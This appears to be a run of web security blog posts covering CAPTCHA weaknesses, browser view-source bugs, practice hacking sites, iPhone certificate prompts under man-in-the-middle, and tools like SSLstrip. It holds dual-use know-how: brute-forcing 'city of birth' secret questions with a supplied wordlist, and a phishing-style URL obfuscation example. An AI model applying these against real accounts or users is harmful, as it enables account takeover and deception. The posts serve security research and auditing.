I don’t have time for a full blown Google rant today, but I was forward this link today and I couldn’t believe my eyes. This is Google’s “What’s Up” CAPTCHA. You know, when I first heard about it it was described to me as “a picture and you have to tell it which way is up”. So my first reaction was “that’s a terrible CAPTCHA - only one in four chance.” Well, it’s not that bad. If you actually read the paper it’s actually a 1/22 chance (assuming no optimizations).

There are other problems with this though - like the fact that it relies on a set of pictures and someone has to make a judgment call on what is the correct position. I bet it’s easier to solve for humans, but it’s also fairly trivial for robots to solve too. CAPTCHA - what does that mean anyway? Let’s see if Google’s project meets the definition:

Completely Automated - Google employees need to make judgment calls ahead of time on each image orientation, so this requirement of a true CAPTCHA fails and incidentally adds a hidden cost to using the “What’s up” CAPTCHA, although it might not be huge, if you make the set small (which would cause other problems).

Public - well, as public as anything Google does is public. It’s not open source or anything, but it’s out there.

Turing Test to tell Computers - I would argue that it’s not a Turing test at all, because if you have a set of 45 robots that try only one guess a piece Google’s “What’s up” will fail to catch two of them. And again - that’s with zero optimizations. Second major failure making this not actually a CAPTCHA.

and Humans Apart - I think it fails this one as well, since blind people are humans. So are non JavaScript/Flash/CSS wielding users - I know I’m human. So that’s three major failures of one definition alone. Not great!

Someone with far greater math skills than I will some day create the mathematical proof that explains why CAPTCHAs aren’t technically achievable. It’s possible to create tests that are vaguely good at telling computers and humans apart (CAPVGTCHAs perhaps?) but unless my understanding of the universe is way off base, I think CAPTCHAs are modern day perpetual motion machines. Everyone thinks they get it and it can work, but it’s never been done, and no one has come even close, in my mind. Sorry, I know this wasn’t as good a Google rant as I normally come up with, but as one of their guys over there recently told me, “You don’t call, you don’t rant…” I know… too busy!

RSAcon is starting today - and yes, I do plan on being there for anyone who happens to be in the bay. I also suggest checking out the WASC meetup on Wednesday at lunch. If you are excited about webappsec you should probably make the meet up. It’s grown to be huge from a few short years ago. We pretty much fill up that entire pool hall at Jillian’s. So yeah, it’s worth being there if you can make it. If you can’t, I suggest you live vicariously, 160 characters at a time via the IRC over SMS that is Twitter.

Next, for those of you who are into good causes Johnny Long sent out an email saying that the informer is back online. So if you have anything to disclose and you want to help out kids - disclose it there and let everyone know. Johnny was nice enough to send out a really nice x-mas card with the kids thanking us and lettings us know that the clickjacking article helped and a nice video etc… Johnny is a nice guy!

Born from much frustration out of not seeing this anywhere else I finally created a dictionary file for all the US cities. I really couldn’t believe such a thing wasn’t already floating around. Tons of companies use US city names as names for hardware devices, passwords for networking devices, and so on. Anyway, it finally came to a head the other day when I was presented with a secret question that said “What is your city of birth?” Well, generally speaking you know that it has to be one out of around 20,000 cities in the US, so if they don’t have any brute force detection on the secret question you can brute force that pretty easily (10,000 guesses on average per account - which only takes about 1/2 an hour if you automate it).

So I looked around places like Packetstorm’s wordlist page and a few other places and finally just decided it was easier to rip one of the GEOIP databases apart and generate my own. So if anyone else has had the same problems, never fear - you can just download the list of US Cities here. Hopefully that will make someone else’s life easier. Happy auditing!

If you haven’t heard about it, Amazon was hit by a pretty interesting attack a few days back, and I thought I should quickly talk about it. A guy named weev was upset that Amazon was pulling the adult content off the site because they were keeping gay and lesbian content. So he found himself a CAPTCHA breaking crew (presumably from this site since he mentioned it) and paid them to create a ton of accounts. Then he used those account to mark all the homosexual materials as offensive content. It took a while for Amazon to recover. You can find a lot of references to the event on Twitter.

So in looking at the scripts weev wrote, although simple they were very effective in the short term. It cause Amazon a lot of grief. There’s a new company called Silver Tail Systems that’s working on an anti-automation/anti-fraud system that would have caught this type of attack in a number of different ways. Namely things like IP address, failure to follow flows properly, HTTP headers, and so on - all leave pretty obvious signals to an automated process. Anyway, I thought it was an interesting attack. Certainly not something you see every day.

So I’ve been sitting on two semi boring view source bugs. Not because I was saving them for a rainy day or anything, but it took me a while to think through them properly. Let’s pretend someone who is not entirely clever wants to do forensics on something to be sure the page is doing what they expect it to. This would be something like making sure that the username and password inputs are being posted to the proper SSL enabled website or something. We wouldn’t want that to be subverted so we view source to make sure it’s all kosher. Here come the two bugs.

The first bug is in Internet Explorer 8. Internet Explorer has a typical null byte bug that makes it truncate the new view source function upon reaching a null byte. So if you were to go to a page that had a null byte in the middle of it, the rest of the page wouldn’t pop up. This is not true if you use an external editor or their new nifty Developer Tools functionality, but not many people do either of those. This doesn’t appear to affect any other Internet Explorer version that I looked at.

Next is a bug in NoScript for Firefox. If you enable JavaScript (imagine it’s a site you trust or are forced to enable for various functionality) and POST some data from one page to another and then view source you’ll notice that instead of it sending a POST request it sends a GET request. I have no idea why, but it can be detected and in the case of seeing a GET request on a page that requires a POST the page can modify it’s resultant source code.

Both of these bugs I find to be fairly minor, but it’s just another reason you can’t trust browsers to present you with all the facts of the situation unless you really know what you’re doing. There’s a demo of the code here if you want to test it yourself (again, only works in IE8.0 or in Firefox with NoScript enabled). In either case you must enable JavaScript for it to work. If I don’t post before then and you celebrate it, Happy Easter!

There’s been more and more legislation put in place to try to discourage hacking in general, and even tool development. Not that I think it’ll lead to many prosecutions anywhere, but nevertheless, it’s always nice to have a place to test. I got an email from one of my readers asking about the hackme series:

Hello and thank you for an awesome blog, and a daily read.

I while back you mentioned some “ready-made” websites that were used in the web app sec sphere to test scanners and specific tools. More specifically you mentioned 2, one of which that was somewhat depreciated, but still had some educational value. I’ve been looking though your posts, but I have had no success finding this entry.

I’ll do one better - here’s a short list I compiled that includes a lot of the more popular tools for ethical testing, without all the muss and fuss of prison time. If you want to hone your skills or just have some fun at work, try these out (in no particular order):

• http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
• http://testasp.acunetix.com/Default.asp
• http://test.acunetix.com/
• http://hackme.ntobjectives.com/
• http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
• http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
• http://www.foundstone.com/us/resources/proddesc/hacmebooks.htm
• http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
• http://zero.webappsecurity.com/
• http://www.hackertest.net/
• http://www.hackthissite.org/
• http://www.mavensecurity.com/WebMaven.php
• http://ha.ckers.org/challenge/
• http://ha.ckers.org/challenge2/
• http://demo.testfire.net/
• http://scanme.nmap.org/
• http://www.hellboundhackers.org/
• http://www.overthewire.org/wargames/
• http://roothack.org/
• http://heorot.net/
• http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
• http://wocares.com/xsstester.php
• https://how2hack.net
• http://hax.tor.hu/

If there are others that should be added to this list, please drop me a line and I’ll add them. I hope everyone had a good April 1st and that insurance covers whatever was damaged.

I was pretty impressed when I saw this. Apparently there is a new certification program for application security specialists. I know other companies have attempted to move in this direction. Most notably is ISC2 with their CSSLP, with their motto, “I fill the holes in your SLC”. You can see that Dave Aitel supports the CSSLP:

While I respect Dave a lot, I can’t get behind filling holes. So, thankfully the CASS is here to fill that gap for us. I went through the process - thankfully it didn’t take much time. But I think someone who goes through the entire process shows a sincere interest, and that should make employers very happy. So if you’re out of a job and need a quick certification, the Certified Application Security Specialist is the cert for you. Go check it out! Don’t be like Dave Aitel, kids. Seriously, don’t.

As some of you may have noticed, there’s a lot more going on in the SSL world and a lot more to come thanks to guys like Mike Zusman, Alex Sotirov Moxie Marlinspike and so on… Papers forthcoming, but in the mean time I thought I’d point out a pretty nasty UI issue with the iPhone, since it’s been something I’ve been meaning to post about for a while. Given the rise in mobile computing as a legitimate way to do business, I think this kind of thing is going to become more important. If an attacker can gain MITM access through a public wifi that the iPhone is using, they can intercept a page that the user normally uses and trusts somewhat, but doesn’t necessary trust with any sensitive data (like a blog or forum that they frequently visit for instance).

What you’re seeing is a 1×1 pixel iframe (doesn’t need to be visible, but it’s good for testing purposes) to https://www.bofa.com/ which uses an invalid certificate. Don’t ask me why one of the largest banks on earth can’t get their certs in order - that’s just the way it is. Anyway, let’s pretend instead of it being incredible sloppiness, it’s actually a MITM. The user is presented with a popup that in no way explains to them what the cert they are accepting is for. So their first instinct would be to accept it, because they aren’t going to be putting any sensitive information into the page anyway. The problem is that the cert stays with the browser session - so it will continue to work, when the user does eventually surf to their bank or whatever SSL page you’ve MITM’d.

Compare that to the desktop version of Safari, where it at least tells you that it’s related to www.bofa.com. Still not the greatest visual cue but it’s something. Incidentally, during this testing I messed around with some of the old tricks and found out that that Safari still suffers from the old URL obfuscation tricks of ages past. Eg: http://www.bofa.com@ha.ckers.org/. *sigh*

Before I begin this post, let me just say, I’ve always been a huge huge fan of technology. I’ve got more insane tech than almost anyone I know (I know a HD Moore, though, so I don’t win that geek war, but I’m close). And I also like to think I’ve got a firm grasp of the web, but every once in a while something strikes me as just simply stunning. Go here, and watch it - I suggest making it full screen: the new GE smart grid website. Go visit it before you read the rest of this.

I admit it, I’m amazed. It’s very very cool tech. It’s the wave of the future, and as much as I’d like to pretend I think it’s a terrible idea, I don’t. It’s just amazing. Annnnd just as I’m getting ready to set up my printer, get my camera ready, install a plugin and give it complete access to my camera… I pause, as my security brain finally wakes up from it’s amazement. I think we’re soon reaching an inflection point, and in many ways have just simply skipped way past it. What’s the point of the web? Is it to delight and amaze? Is it to allow better consumerism? Is it for communication? Is it to impart information? Is it to download porn? Is it all of those things?

How can we possibly secure ourselves when amazing applications are finally on the horizon that make even hardened security folks want to drop all their guards to join in the party? Am I becoming a Scrooge? “Cool tech - bah humbug!” GE’s application is a wiretapper’s dream application yet I’m compelled to join in and be amazed. *sigh* I guess I’ll just have to watch it again and pretend I don’t want to install it.

There has been a lot going on in the man in the middle space over the last few months. Frankly - I’m impressed. It’s something I haven’t talked much about publicly, but rather something I like to talk about to people at conferences. In fact, some of the innovations in the space is stuff I’ve been trying to get guys like Robert Graham and Dave Maynor to write into ferret for years now. That said, there has finally been some major leaps forward in actual technology to empower really nasty MITM attacks.

One thing I’ve been annoyed with is that although MITM is technically possible, and indeed has even been demonstrated in lab environments a lot, it’s really not all that common, unless you’re talking about passive listening. There’s not a lot of programs that use MITM to actually modify traffic. Modifying it is where you get a lot more bang for your buck. There’s a good paper over at Watchfire about why active man in the middle attacks can give you a lot more. In fact, some of what’s in this paper was actually demonstrate by Rich Mogull at DefCon last year. No one was probably paying any mind to the analyst but that guy is ahead of his time, let me tell you! He was creating iframes to things like the gmail contact list and addresses from yahoo. Cool stuff - and that was just an evil twin.

Also there are a few newish tools that are really important in this space. I think both need to evolve a bit, but they’re both open source, written in python, easy to modify and do 90% of the heavy lifting. So in my mind, active MITM attacks are finally really viable for the average attacker. The first tool is SSL strip written by Moxy. It does a great job of showing how you can just down-convert into an HTTP mode, and most of the time users won’t notice - especially on pages that just post to HTTPS (a huge pet peeve of mine).

The second tool is Middler written by Jay Beale. Jay took the concept to the next level and actually built in most of the DNS spoofing/ARP spoofing part of the attack that you need, so you don’t have to run separate programs to get the attack working. Both programs deserve a lot of praise for getting this attack to be more widely understood and realistic and beyond the passive sniffing that we are all accustomed to with tools like ferret and dsniff. Sure, the concept of a MITM attack is nowhere near new, but now it’s finally accessible to the average attacker - which means it’s something we should really start thinking about, beyond saying HTTPS is a solution to our problems - clearly it is not (and for a lot more reasons than Moxy went into too).